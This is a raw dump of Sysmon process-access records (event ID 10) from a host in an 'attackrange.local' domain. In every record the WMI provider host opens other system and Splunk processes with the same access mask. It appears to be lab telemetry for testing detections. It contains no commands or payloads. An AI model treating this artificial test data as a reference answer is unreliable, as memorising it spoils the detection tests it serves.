15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.615{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 